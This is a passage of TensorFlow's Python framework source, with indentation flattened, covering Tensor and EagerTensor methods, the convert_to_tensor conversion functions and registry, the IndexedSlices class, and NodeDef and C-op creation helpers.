In some cases, the inferred shape may have unknown dimensions. If
the caller has additional information about the values of these
dimensions, `Tensor.set_shape()` can be used to augment the
inferred shape.
Returns:
A `TensorShape` representing the shape of this tensor.
"""
if self._shape_val is None:
if _USE_C_SHAPES:
self._shape_val = self._c_api_shape()
else:
# Call set_shape_and_handle_data_for_outputs in topological order on all
# ops that are needed to compute self.op's shape. We do this instead of
# having set_shape_and_handle_data_for_outputs recursively call
# Operation.shape on self.op.inputs to overflowing the call stack.
need_shapes = self._get_input_ops_without_shapes(self.op)
need_shapes.sort(key=lambda op: op._id)
for op in need_shapes:
set_shape_and_handle_data_for_outputs(op)
return self._shape_val
def _get_input_ops_without_shapes(self, target_op):
"""Returns ops needing shape inference to compute target_op's shape."""
result = []
stack = [self._op]
visited = set()
while stack:
op = stack.pop()
if op in visited: continue
result.append(op)
stack.extend(t.op for t in op.inputs if t._shape_val is None)
visited.add(op)
return result
def _c_api_shape(self):
"""Returns the TensorShape of this tensor according to the C API."""
c_graph = self._op._graph._c_graph # pylint: disable=protected-access
shape_vector, unknown_shape = c_api.TF_GraphGetTensorShapeHelper(
c_graph, self._as_tf_output())
if unknown_shape:
return tensor_shape.unknown_shape()
else:
shape_vector = [None if d == -1 else d for d in shape_vector]
return tensor_shape.TensorShape(shape_vector)
@property
def _shape(self):
logging.warning("Tensor._shape is private, use Tensor.shape "
"instead. Tensor._shape will eventually be removed.")
return self.shape
@_shape.setter
def _shape(self, value):
raise ValueError(
"Tensor._shape cannot be assigned, use Tensor.set_shape instead.")
def __iter__(self):
if not context.executing_eagerly():
raise TypeError(
"Tensor objects are not iterable when eager execution is not "
"enabled. To iterate over this tensor use tf.map_fn.")
shape = self._shape_tuple()
if shape is None:
raise TypeError("Cannot iterate over a tensor with unknown shape.")
if not shape:
raise TypeError("Cannot iterate over a scalar tensor.")
if shape[0] is None:
raise TypeError(
"Cannot iterate over a tensor with unknown first dimension.")
for i in xrange(shape[0]):
yield self[i]
def _shape_as_list(self):
if self.shape.ndims is not None:
return [dim.value for dim in self.shape.dims]
else:
return None
def _shape_tuple(self):
shape = self._shape_as_list()
if shape is None:
return None
return tuple(shape)
def _rank(self):
"""Integer rank of this Tensor, if known, else None.
Returns:
Integer rank or None
"""
return self.shape.ndims
def get_shape(self):
"""Alias of Tensor.shape."""
return self.shape
def set_shape(self, shape):
"""Updates the shape of this tensor.
This method can be called multiple times, and will merge the given
`shape` with the current shape of this tensor. It can be used to
provide additional information about the shape of this tensor that
cannot be inferred from the graph alone. For example, this can be used
to provide additional information about the shapes of images:
```python
_, image_data = tf.TFRecordReader(...).read(...)
image = tf.image.decode_png(image_data, channels=3)
# The height and width dimensions of `image` are data dependent, and
# cannot be computed without executing the op.
print(image.shape)
==> TensorShape([Dimension(None), Dimension(None), Dimension(3)])
# We know that each image in this dataset is 28 x 28 pixels.
image.set_shape([28, 28, 3])
print(image.shape)
==> TensorShape([Dimension(28), Dimension(28), Dimension(3)])
```
Args:
shape: A `TensorShape` representing the shape of this tensor, a
`TensorShapeProto`, a list, a tuple, or None.
Raises:
ValueError: If `shape` is not compatible with the current shape of
this tensor.
"""
if _USE_C_SHAPES: # pylint: disable=protected-access
# Reset cached shape.
self._shape_val = None
else:
self._shape_val = self.shape.merge_with(shape)
# Update C shape even if _USE_C_SHAPES = False, since we still want
# set_shape to be reflected in the C API graph for when we run it.
if not isinstance(shape, tensor_shape.TensorShape):
shape = tensor_shape.TensorShape(shape)
dim_list = []
if shape.dims is None:
unknown_shape = True
else:
unknown_shape = False
for dim in shape.dims:
if dim.value is None:
dim_list.append(-1)
else:
dim_list.append(dim.value)
try:
c_api.TF_GraphSetTensorShape_wrapper(
self._op._graph._c_graph, # pylint: disable=protected-access
self._as_tf_output(),
dim_list,
unknown_shape)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
@property
def value_index(self):
"""The index of this tensor in the outputs of its `Operation`."""
return self._value_index
def consumers(self):
"""Returns a list of `Operation`s that consume this tensor.
Returns:
A list of `Operation`s.
"""
consumer_names = c_api.TF_OperationOutputConsumers_wrapper(
self._as_tf_output())
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(name)
for name in consumer_names
]
# pylint: enable=protected-access
def _as_node_def_input(self):
"""Return a value to use for the NodeDef "input" attribute.
The returned string can be used in a NodeDef "input" attribute
to indicate that the NodeDef uses this Tensor as input.
Raises:
ValueError: if this Tensor's Operation does not have a name.
Returns:
a string.
"""
if not self._op.name:
raise ValueError("Operation was not named: %s" % self._op)
if self._value_index == 0:
return self._op.name
else:
return "%s:%d" % (self._op.name, self._value_index)
def _as_tf_output(self):
# pylint: disable=protected-access
return c_api_util.tf_output(self.op._c_op, self.value_index)
# pylint: enable=protected-access
def __str__(self):
return "Tensor(\"%s\"%s%s%s)" % (
self.name, (", shape=%s" % self.get_shape())
if self.get_shape().ndims is not None else "",
(", dtype=%s" % self._dtype.name)
if self._dtype else "", (", device=%s" % self.device)
if self.device else "")
def __repr__(self):
return "<tf.Tensor '%s' shape=%s dtype=%s>" % (self.name, self.get_shape(),
self._dtype.name)
def __hash__(self):
# Necessary to support Python's collection membership operators
return id(self)
def __eq__(self, other):
# Necessary to support Python's collection membership operators
return id(self) == id(other)
def __copy__(self):
# Make sure _shape_val is computed before we copy.
# TODO(b/77597810): get rid of Tensor copies.
if self._shape_val is None:
set_shape_and_handle_data_for_outputs(self.op)
cls = self.__class__
result = cls.__new__(cls)
result.__dict__.update(self.__dict__)
return result
# NOTE(mrry): This enables the Tensor's overloaded "right" binary
# operators to run when the left operand is an ndarray, because it
# accords the Tensor class higher priority than an ndarray, or a
# numpy matrix.
# TODO(mrry): Convert this to using numpy's __numpy_ufunc__
# mechanism, which allows more control over how Tensors interact
# with ndarrays.
__array_priority__ = 100
@staticmethod
def _override_operator(operator, func):
_override_helper(Tensor, operator, func)
def __bool__(self):
"""Dummy method to prevent a tensor from being used as a Python `bool`.
This overload raises a `TypeError` when the user inadvertently
treats a `Tensor` as a boolean (e.g. in an `if` statement). For
example:
```python
if tf.constant(True): # Will raise.
# ...
if tf.constant(5) < tf.constant(7): # Will raise.
# ...
```
This disallows ambiguities between testing the Python value vs testing the
dynamic condition of the `Tensor`.
Raises:
`TypeError`.
"""
raise TypeError("Using a `tf.Tensor` as a Python `bool` is not allowed. "
"Use `if t is not None:` instead of `if t:` to test if a "
"tensor is defined, and use TensorFlow ops such as "
"tf.cond to execute subgraphs conditioned on the value of "
"a tensor.")
def __nonzero__(self):
"""Dummy method to prevent a tensor from being used as a Python `bool`.
This is the Python 2.x counterpart to `__bool__()` above.
Raises:
`TypeError`.
"""
raise TypeError("Using a `tf.Tensor` as a Python `bool` is not allowed. "
"Use `if t is not None:` instead of `if t:` to test if a "
"tensor is defined, and use TensorFlow ops such as "
"tf.cond to execute subgraphs conditioned on the value of "
"a tensor.")
def eval(self, feed_dict=None, session=None):
"""Evaluates this tensor in a `Session`.
Calling this method will execute all preceding operations that
produce the inputs needed for the operation that produces this
tensor.
*N.B.* Before invoking `Tensor.eval()`, its graph must have been
launched in a session, and either a default session must be
available, or `session` must be specified explicitly.
Args:
feed_dict: A dictionary that maps `Tensor` objects to feed values.
See @{tf.Session.run} for a
description of the valid feed values.
session: (Optional.) The `Session` to be used to evaluate this tensor. If
none, the default session will be used.
Returns:
A numpy array corresponding to the value of this tensor.
"""
return _eval_using_default_session(self, feed_dict, self.graph, session)
# TODO(agarwal): consider getting rid of this.
class _EagerTensorBase(Tensor):
"""Base class for EagerTensor."""
@property
def dtype(self):
# Note: using the intern table directly here as this is
# performance-sensitive in some models.
return dtypes._INTERN_TABLE[self._datatype_enum()] # pylint: disable=protected-access
def numpy(self):
"""Returns a numpy array or a scalar with the same contents as the Tensor.
TODO(ashankar,agarwal): Perhaps this should NOT reference the underlying
buffer but instead always explicitly copy? Note that currently it may or may
not copy based on whether the numpy data is properly aligned or not.
Returns:
A numpy array or a scalar. Numpy array may share memory with the
Tensor object. Any changes to one may be reflected in the other. A scalar
value is returned when self has rank 0.
Raises:
ValueError: if the type of this Tensor is not representable in numpy.
"""
if self.dtype == dtypes.resource:
raise ValueError("Resource handles are not convertible to numpy.")
return self.cpu()._numpy() # pylint: disable=protected-access
# __int__ and __float__ may copy the tensor to CPU and
# only work for scalars; values are cast as per numpy.
def __int__(self):
return int(self.numpy())
def __float__(self):
return float(self.numpy())
def __array__(self, dtype=None):
return np.array(self.numpy(), dtype=dtype)
def __format__(self, format_spec):
return self.numpy().__format__(format_spec)
def _numpy(self):
raise NotImplementedError()
def __copy__(self):
# Eager Tensors are immutable so it's safe to return themselves as a copy.
return self
def __deepcopy__(self, memo):
# Eager Tensors are immutable so it's safe to return themselves as a copy.
del memo
return self
def _datatype_enum(self):
raise NotImplementedError()
def _shape_tuple(self):
"""The shape of this Tensor, as a tuple.
This is more performant than tuple(shape().as_list()) as it avoids
two list and one object creation. Marked private for now as from an API
perspective, it would be better to have a single performant way of
getting a shape rather than exposing shape() and shape_tuple()
(and heaven forbid, shape_list() etc. as well!). Punting on that for now,
but ideally one would work things out and remove the need for this method.
Returns:
tuple with the shape.
"""
raise NotImplementedError()
def _rank(self):
"""Integer rank of this Tensor.
Unlike regular Tensors, the rank is always known for EagerTensors.
This is more performant than len(self._shape_tuple())
Returns:
Integer rank
"""
raise NotImplementedError()
def _copy_to_device(self, context, device): # pylint: disable=redefined-outer-name
raise NotImplementedError()
def __str__(self):
return "tf.Tensor(%s, shape=%s, dtype=%s)" % (numpy_text(self),
self.shape,
self.dtype.name)
def __repr__(self):
return "<tf.Tensor: id=%s, shape=%s, dtype=%s, numpy=%s>" % (
self._id, self.shape, self.dtype.name, numpy_text(self, is_repr=True))
@staticmethod
def _override_operator(name, func):
setattr(_EagerTensorBase, name, func)
def _copy(self, ctx=None, device_name=None):
"""Copies tensor to dest device."""
# pylint: disable=protected-access
# Creates a new tensor on the dest device.
if ctx is None:
ctx = context.context()
if device_name is None:
device_name = ctx.device_name
# pylint: disable=protected-access
try:
new_tensor = self._copy_to_device(context=ctx._handle, device=device_name)
except core._NotOkStatusException as e:
six.raise_from(core._status_to_exception(e.code, e.message), None)
# Record the copy on tape and define backprop copy as well.
if context.executing_eagerly():
self_device = self.device
def grad_fun(dresult):
return [dresult._copy(device_name=self_device)]
tape.record_operation("_copy", [new_tensor], [self], grad_fun)
return new_tensor
# pylint: enable=protected-access
@property
def shape(self):
if self._tensor_shape is None: # pylint: disable=access-member-before-definition
# `_tensor_shape` is declared and defined in the definition of
# `EagerTensor`, in C.
self._tensor_shape = tensor_shape.TensorShape(self._shape_tuple())
return self._tensor_shape
def get_shape(self):
"""Alias of Tensor.shape."""
return self.shape
def _shape_as_list(self):
"""The shape of the tensor as a list."""
return list(self._shape_tuple())
@property
def ndim(self):
"""Returns the number of Tensor dimensions."""
return self.shape.ndims
def cpu(self):
"""A copy of this Tensor with contents backed by host memory."""
return self._copy(context.context(), "CPU:0")
def gpu(self, gpu_index=0):
"""A copy of this Tensor with contents backed by memory on the GPU.
Arguments:
gpu_index: Identifies which GPU to place the contents on the returned
Tensor in.
Returns:
A GPU-memory backed Tensor object initialized with the same contents
as this Tensor.
"""
return self._copy(context.context(), "GPU:" + str(gpu_index))
def __bool__(self):
if self._shape_tuple() != (): # pylint: disable=g-explicit-bool-comparison
raise ValueError(
"Non-scalar tensor %s cannot be converted to boolean." % repr(self))
if self.dtype != dtypes.bool:
raise ValueError(
"Non-boolean tensor %s cannot be converted to boolean." % repr(self))
return bool(self.cpu().numpy())
def __nonzero__(self):
return self.__bool__()
def set_shape(self, shape):
if not self.shape.is_compatible_with(shape):
raise ValueError(
"Tensor's shape %s is not compatible with supplied shape %s" %
(self.shape, shape))
# Methods not supported / implemented for Eager Tensors.
@property
def op(self):
raise AttributeError(
"Tensor.op is meaningless when eager execution is enabled.")
@property
def graph(self):
raise AttributeError(
"Tensor.graph is meaningless when eager execution is enabled.")
@property
def name(self):
raise AttributeError(
"Tensor.name is meaningless when eager execution is enabled.")
@property
def value_index(self):
raise AttributeError(
"Tensor.value_index is meaningless when eager execution is enabled.")
def consumers(self):
raise NotImplementedError(
"Tensor.consumers is meaningless when eager execution is enabled.")
def _add_consumer(self, consumer):
raise NotImplementedError(
"_add_consumer not supported when eager execution is enabled.")
def _as_node_def_input(self):
raise NotImplementedError(
"_as_node_def_input not supported when eager execution is enabled.")
def _as_tf_output(self):
raise NotImplementedError(
"_as_tf_output not supported when eager execution is enabled.")
def eval(self, feed_dict=None, session=None):
raise NotImplementedError(
"eval is not supported when eager execution is enabled, "
"is .numpy() what you're looking for?"
)
# This call creates an EagerTensor class, as a subclass of _EagerTensorBase, and
# registers it with the current module.
EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
def _TensorTensorConversionFunction(t, dtype=None, name=None, as_ref=False):
_ = name, as_ref
if dtype and not dtype.is_compatible_with(t.dtype):
raise ValueError(
"Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
(dtype.name, t.dtype.name, str(t)))
return t
_tensor_conversion_func_registry = {
0: [(Tensor, _TensorTensorConversionFunction)]
}
_tensor_conversion_func_cache = {}
_tensor_conversion_func_lock = threading.Lock()
register_dense_tensor_like_type(Tensor)
@tf_export("convert_to_tensor")
def convert_to_tensor(value, dtype=None, name=None, preferred_dtype=None):
"""Converts the given `value` to a `Tensor`.
This function converts Python objects of various types to `Tensor`
objects. It accepts `Tensor` objects, numpy arrays, Python lists,
and Python scalars. For example:
```python
import numpy as np
def my_func(arg):
arg = tf.convert_to_tensor(arg, dtype=tf.float32)
return tf.matmul(arg, arg) + arg
# The following calls are equivalent.
value_1 = my_func(tf.constant([[1.0, 2.0], [3.0, 4.0]]))
value_2 = my_func([[1.0, 2.0], [3.0, 4.0]])
value_3 = my_func(np.array([[1.0, 2.0], [3.0, 4.0]], dtype=np.float32))
```
This function can be useful when composing a new operation in Python
(such as `my_func` in the example above). All standard Python op
constructors apply this function to each of their Tensor-valued
inputs, which allows those ops to accept numpy arrays, Python lists,
and scalars in addition to `Tensor` objects.
Note: This function diverges from default Numpy behavior for `float` and
`string` types when `None` is present in a Python list or scalar. Rather
than silently converting `None` values, an error will be thrown.
Args:
value: An object whose type has a registered `Tensor` conversion function.
dtype: Optional element type for the returned tensor. If missing, the
type is inferred from the type of `value`.
name: Optional name to use if a new `Tensor` is created.
preferred_dtype: Optional element type for the returned tensor,
used when dtype is None. In some cases, a caller may not have a
dtype in mind when converting to a tensor, so preferred_dtype
can be used as a soft preference. If the conversion to
`preferred_dtype` is not possible, this argument has no effect.
Returns:
An `Output` based on `value`.
Raises:
TypeError: If no conversion function is registered for `value`.
RuntimeError: If a registered conversion function returns an invalid value.
"""
return internal_convert_to_tensor(
value=value,
dtype=dtype,
name=name,
preferred_dtype=preferred_dtype,
as_ref=False)
def _error_prefix(name):
return "" if name is None else "%s: " % name
def internal_convert_to_tensor(value,
dtype=None,
name=None,
as_ref=False,
preferred_dtype=None,
ctx=None):
"""Converts the given `value` to an `Tensor`.
This function converts Python objects of various types to `Tensor`
objects. It accepts `Tensor` objects, numpy arrays, Python lists,
and Python scalars. For example:
This function can be useful when composing a new operation in Python
All standard Python op constructors apply this function to each of their
Tensor-valued inputs, which allows those ops to accept numpy arrays, Python
lists, and scalars in addition to `Tensor` objects.
Args:
value: An object whose type has a registered `Tensor` conversion function.
dtype: Optional element type for the returned tensor. If missing, the
type is inferred from the type of `value`.
name: Optional name to use if a new `Tensor` is created.
as_ref: True if we want the mutable view of Variables, if applicable.
preferred_dtype: Optional element type for the returned tensor,
used when dtype is None. In some cases, a caller may not have a
dtype in mind when converting to a tensor, so preferred_dtype
can be used as a soft preference. If the conversion to
`preferred_dtype` is not possible, this argument has no effect.
ctx: Optional: The value of context.context().
Returns:
A `Tensor` based on `value`.
Raises:
TypeError: If no conversion function is registered for `value`.
RuntimeError: If a registered conversion function returns an invalid value.
"""
if ctx is None: ctx = context.context()
if isinstance(value, EagerTensor):
if ctx.executing_eagerly():
# Fast path for EagerTensors that don't need any conversion.
# Note that we don't check that value's dtype matches the dtype
# argument. We expect that the C runtime will do that checking
# when we execute the kernel.
return value
else:
graph = get_default_graph()
if not graph.building_function:
raise RuntimeError("Attempting to capture an EagerTensor without "
"building a function.")
return graph.capture(value, name=name)
if dtype is not None:
dtype = dtypes.as_dtype(dtype)
unwrapped_type = type(value)
conversion_func_list = _tensor_conversion_func_cache.get(unwrapped_type, None)
if conversion_func_list is None:
with _tensor_conversion_func_lock:
conversion_func_list = []
for _, funcs_at_priority in sorted(
_tensor_conversion_func_registry.items()):
for base_type, conversion_func in funcs_at_priority:
if isinstance(value, base_type):
conversion_func_list.append((base_type, conversion_func))
_tensor_conversion_func_cache[unwrapped_type] = conversion_func_list
for base_type, conversion_func in conversion_func_list:
# If dtype is None but preferred_dtype is not None, we try to
# cast to preferred_dtype first.
ret = None
if dtype is None and preferred_dtype is not None:
try:
ret = conversion_func(
value, dtype=preferred_dtype, name=name, as_ref=as_ref)
except (TypeError, ValueError, errors.UnimplementedError,
errors.InvalidArgumentError):
# Could not coerce the conversion to use the preferred dtype.
ret = None
if ret is not None and ret is not NotImplemented:
if (ret.dtype.base_dtype !=
dtypes.as_dtype(preferred_dtype).base_dtype):
raise TypeError("convert_to_tensor did not convert to "
"the preferred dtype: %s vs %s " %
(ret.dtype.base_dtype,
dtypes.as_dtype(preferred_dtype).base_dtype))
if ret is None:
ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)
if ret is NotImplemented:
continue
if not isinstance(ret, Tensor):
raise RuntimeError(
"%sConversion function %r for type %s returned non-Tensor: %r" %
(_error_prefix(name), conversion_func, base_type, ret))
if dtype and not dtype.is_compatible_with(ret.dtype):
raise RuntimeError(
"%sConversion function %r for type %s returned incompatible "
"dtype: requested = %s, actual = %s" %
(_error_prefix(name), conversion_func, base_type, dtype.name,
ret.dtype.name))
return ret
raise TypeError("%sCannot convert %r with type %s to Tensor: "
"no conversion function registered." %
(_error_prefix(name), value, unwrapped_type))
def internal_convert_n_to_tensor(values,
dtype=None,
name=None,
as_ref=False,
preferred_dtype=None,
ctx=None):
"""Converts `values` to a list of `Tensor` objects.
Args:
values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
name: (Optional.) A name prefix to used when a new `Tensor` is
created, in which case element `i` will be given the name `name
+ '_' + i`.
as_ref: True if the caller wants the results as ref tensors.
preferred_dtype: Optional element type for the returned tensors,
used when dtype is None. In some cases, a caller may not have a
dtype in mind when converting to a tensor, so preferred_dtype
can be used as a soft preference. If the conversion to
`preferred_dtype` is not possible, this argument has no effect.
ctx: The value of context.context().
Returns:
A list of `Tensor` and/or `IndexedSlices` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
if not isinstance(values, collections.Sequence):
raise TypeError("values must be a list.")
ret = []
if ctx is None: ctx = context.context()
for i, value in enumerate(values):
n = None if name is None else "%s_%d" % (name, i)
ret.append(
internal_convert_to_tensor(
value,
dtype=dtype,
name=n,
as_ref=as_ref,
preferred_dtype=preferred_dtype,
ctx=ctx))
return ret
def convert_n_to_tensor(values, dtype=None, name=None, preferred_dtype=None):
"""Converts `values` to a list of `Tensor` objects.
Args:
values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
name: (Optional.) A name prefix to used when a new `Tensor` is
created, in which case element `i` will be given the name `name
+ '_' + i`.
preferred_dtype: Optional element type for the returned tensors,
used when dtype is None. In some cases, a caller may not have a
dtype in mind when converting to a tensor, so preferred_dtype
can be used as a soft preference. If the conversion to
`preferred_dtype` is not possible, this argument has no effect.
Returns:
A list of `Tensor` and/or `IndexedSlices` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
return internal_convert_n_to_tensor(
values=values,
dtype=dtype,
name=name,
preferred_dtype=preferred_dtype,
as_ref=False)
@tf_export("convert_to_tensor_or_indexed_slices")
def convert_to_tensor_or_indexed_slices(value, dtype=None, name=None):
"""Converts the given object to a `Tensor` or an `IndexedSlices`.
If `value` is an `IndexedSlices` or `SparseTensor` it is returned
unmodified. Otherwise, it is converted to a `Tensor` using
`convert_to_tensor()`.
Args:
value: An `IndexedSlices`, `SparseTensor`, or an object that can be consumed
by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` or
`IndexedSlices`.
name: (Optional.) A name to use if a new `Tensor` is created.
Returns:
An `Tensor`, `IndexedSlices`, or `SparseTensor` based on `value`.
Raises:
ValueError: If `dtype` does not match the element type of `value`.
"""
return internal_convert_to_tensor_or_indexed_slices(
value=value, dtype=dtype, name=name, as_ref=False)
def internal_convert_to_tensor_or_indexed_slices(value,
dtype=None,
name=None,
as_ref=False):
"""Converts the given object to an `Tensor` or an `IndexedSlices`.
If `value` is an `IndexedSlices` or `SparseTensor` it is returned
unmodified. Otherwise, it is converted to a `Tensor` using
`convert_to_tensor()`.
Args:
value: An `IndexedSlices`, `SparseTensor`, or an object that can be consumed
by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` or
`IndexedSlices`.
name: (Optional.) A name to use if a new `Tensor` is created.
as_ref: True if the caller wants the results as ref tensors.
Returns:
An `Tensor`, `IndexedSlices`, or `SparseTensor` based on `value`.
Raises:
ValueError: If `dtype` does not match the element type of `value`.
"""
if isinstance(value, EagerTensor) and not context.executing_eagerly():
return internal_convert_to_tensor(
value, dtype=dtype, name=name, as_ref=as_ref)
elif isinstance(value, _TensorLike):
if dtype and not dtypes.as_dtype(dtype).is_compatible_with(value.dtype):
raise ValueError(
"Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
(dtypes.as_dtype(dtype).name, value.dtype.name, str(value)))
return value
else:
return internal_convert_to_tensor(
value, dtype=dtype, name=name, as_ref=as_ref)
def internal_convert_n_to_tensor_or_indexed_slices(values,
dtype=None,
name=None,
as_ref=False):
"""Converts `values` to a list of `Tensor` or `IndexedSlices` objects.
Any `IndexedSlices` or `SparseTensor` objects in `values` are returned
unmodified.
Args:
values: A list of `None`, `IndexedSlices`, `SparseTensor`, or objects that
can be consumed by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor`
`IndexedSlices`.
name: (Optional.) A name prefix to used when a new `Tensor` is
created, in which case element `i` will be given the name `name
+ '_' + i`.
as_ref: True if the caller wants the results as ref tensors.
Returns:
A list of `Tensor`, `IndexedSlices`, and/or `SparseTensor` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
if not isinstance(values, collections.Sequence):
raise TypeError("values must be a list.")
ret = []
for i, value in enumerate(values):
if value is None:
ret.append(value)
else:
n = None if name is None else "%s_%d" % (name, i)
ret.append(
internal_convert_to_tensor_or_indexed_slices(
value, dtype=dtype, name=n, as_ref=as_ref))
return ret
def convert_n_to_tensor_or_indexed_slices(values, dtype=None, name=None):
"""Converts `values` to a list of `Output` or `IndexedSlices` objects.
Any `IndexedSlices` or `SparseTensor` objects in `values` are returned
unmodified.
Args:
values: A list of `None`, `IndexedSlices`, `SparseTensor`, or objects that
can be consumed by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor`
`IndexedSlices`.
name: (Optional.) A name prefix to used when a new `Tensor` is
created, in which case element `i` will be given the name `name
+ '_' + i`.
Returns:
A list of `Tensor`, `IndexedSlices`, and/or `SparseTensor` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
return internal_convert_n_to_tensor_or_indexed_slices(
values=values, dtype=dtype, name=name, as_ref=False)
# TODO(josh11b): Add ctx argument to conversion_func() signature.
@tf_export("register_tensor_conversion_function")
def register_tensor_conversion_function(base_type,
conversion_func,
priority=100):
"""Registers a function for converting objects of `base_type` to `Tensor`.
The conversion function must have the following signature:
```python
def conversion_func(value, dtype=None, name=None, as_ref=False):
# ...
```
It must return a `Tensor` with the given `dtype` if specified. If the
conversion function creates a new `Tensor`, it should use the given
`name` if specified. All exceptions will be propagated to the caller.
The conversion function may return `NotImplemented` for some
inputs. In this case, the conversion process will continue to try
subsequent conversion functions.
If `as_ref` is true, the function must return a `Tensor` reference,
such as a `Variable`.
NOTE: The conversion functions will execute in order of priority,
followed by order of registration. To ensure that a conversion function
`F` runs before another conversion function `G`, ensure that `F` is
registered with a smaller priority than `G`.
Args:
base_type: The base type or tuple of base types for all objects that
`conversion_func` accepts.
conversion_func: A function that converts instances of `base_type` to
`Tensor`.
priority: Optional integer that indicates the priority for applying this
conversion function. Conversion functions with smaller priority values
run earlier than conversion functions with larger priority values.
Defaults to 100.
Raises:
TypeError: If the arguments do not have the appropriate type.
"""
global _tensor_conversion_func_cache
with _tensor_conversion_func_lock:
if not (isinstance(base_type, type) or
(isinstance(base_type, tuple) and
all(isinstance(x, type) for x in base_type))):
raise TypeError("base_type must be a type or a tuple of types.")
if not callable(conversion_func):
raise TypeError("conversion_func must be callable.")
# context._context is checked so that we don't inadvertently create it.
# This is because enable_eager_execution will fail when called from the main
# function if the context._context is already created, and the
# register_tensor_conversion_function calls happen when the module is
# imported.
if context._context is not None and context.executing_eagerly(
) and isinstance(base_type, six.integer_types + (
float,
np.ndarray,
)):
# TODO(nareshmodi): consider setting a context variable which disables the
# fastpath instead.
raise TypeError(
"Cannot register conversions for numpy arrays, python number types "
"when executing eagerly.")
try:
funcs_at_priority = _tensor_conversion_func_registry[priority]
except KeyError:
funcs_at_priority = []
_tensor_conversion_func_registry[priority] = funcs_at_priority
funcs_at_priority.append((base_type, conversion_func))
_tensor_conversion_func_cache = {}
@tf_export("IndexedSlices")
class IndexedSlices(_TensorLike):
"""A sparse representation of a set of tensor slices at given indices.
This class is a simple wrapper for a pair of `Tensor` objects:
* `values`: A `Tensor` of any dtype with shape `[D0, D1, ..., Dn]`.
* `indices`: A 1-D integer `Tensor` with shape `[D0]`.
An `IndexedSlices` is typically used to represent a subset of a larger
tensor `dense` of shape `[LARGE0, D1, .. , DN]` where `LARGE0 >> D0`.
The values in `indices` are the indices in the first dimension of
the slices that have been extracted from the larger tensor.
The dense tensor `dense` represented by an `IndexedSlices` `slices` has
```python
dense[slices.indices[i], :, :, :, ...] = slices.values[i, :, :, :, ...]
```
The `IndexedSlices` class is used principally in the definition of
gradients for operations that have sparse gradients
(e.g. @{tf.gather}).
Contrast this representation with
@{tf.SparseTensor},
which uses multi-dimensional indices and scalar values.
"""
def __init__(self, values, indices, dense_shape=None):
"""Creates an `IndexedSlices`."""
_get_graph_from_inputs([values, indices, dense_shape])
self._values = values
self._indices = indices
self._dense_shape = dense_shape
@property
def values(self):
"""A `Tensor` containing the values of the slices."""
return self._values
@property
def indices(self):
"""A 1-D `Tensor` containing the indices of the slices."""
return self._indices
@property
def dense_shape(self):
"""A 1-D `Tensor` containing the shape of the corresponding dense tensor."""
return self._dense_shape
@property
def name(self):
"""The name of this `IndexedSlices`."""
return self.values.name
@property
def device(self):
"""The name of the device on which `values` will be produced, or `None`."""
return self.values.device
@property
def op(self):
"""The `Operation` that produces `values` as an output."""
return self.values.op
@property
def dtype(self):
"""The `DType` of elements in this tensor."""
return self.values.dtype
@property
def graph(self):
"""The `Graph` that contains the values, indices, and shape tensors."""
return self._values.graph
def __str__(self):
return "IndexedSlices(indices=%s, values=%s%s)" % (
self._indices, self._values, (", dense_shape=%s" % self._dense_shape)
if self._dense_shape is not None else "")
def __neg__(self):
return IndexedSlices(-self.values, self.indices, self.dense_shape)
IndexedSlicesValue = collections.namedtuple(
"IndexedSlicesValue", ["values", "indices", "dense_shape"])
def _device_string(dev_spec):
if isinstance(dev_spec, pydev.DeviceSpec):
return dev_spec.to_string()
else:
return dev_spec
def _NodeDef(op_type, name, device=None, attrs=None): # pylint: disable=redefined-outer-name
"""Create a NodeDef proto.
Args:
op_type: Value for the "op" attribute of the NodeDef proto.
name: Value for the "name" attribute of the NodeDef proto.
device: string, device, or function from NodeDef to string.
Value for the "device" attribute of the NodeDef proto.
attrs: Optional dictionary where the key is the attribute name (a string)
and the value is the respective "attr" attribute of the NodeDef proto (an
AttrValue).
Returns:
A node_def_pb2.NodeDef protocol buffer.
"""
node_def = node_def_pb2.NodeDef()
node_def.op = compat.as_bytes(op_type)
node_def.name = compat.as_bytes(name)
if attrs is not None:
for k, v in six.iteritems(attrs):
node_def.attr[k].CopyFrom(v)
if device is not None:
if callable(device):
node_def.device = device(node_def)
else:
node_def.device = _device_string(device)
return node_def
# Copied from core/framework/node_def_util.cc
# TODO(mrry,josh11b): Consolidate this validation in C++ code.
_VALID_OP_NAME_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\-/]*$")
_VALID_SCOPE_NAME_REGEX = re.compile("^[A-Za-z0-9_.\\-/]*$")
def _create_c_op(graph, node_def, inputs, control_inputs):
"""Creates a TF_Operation.
Args:
graph: a `Graph`.
node_def: `node_def_pb2.NodeDef` for the operation to create.
inputs: A list of `Tensor`s (corresponding to scalar inputs) and lists of
`Tensor`s (corresponding to sequence inputs, e.g. "int64 * N",
"list(int64)"). The length of the list should be equal to the number of
inputs specified by this operation's op def.
control_inputs: A list of `Operation`s to set as control dependencies.
Returns:
A wrapped TF_Operation*.
"""
# pylint: disable=protected-access
op_desc = c_api.TF_NewOperation(graph._c_graph,
compat.as_str(node_def.op),
compat.as_str(node_def.name))
# Add inputs
for op_input in inputs:
if isinstance(op_input, (list, tuple)):
c_api.TF_AddInputList(op_desc, [t._as_tf_output() for t in op_input])
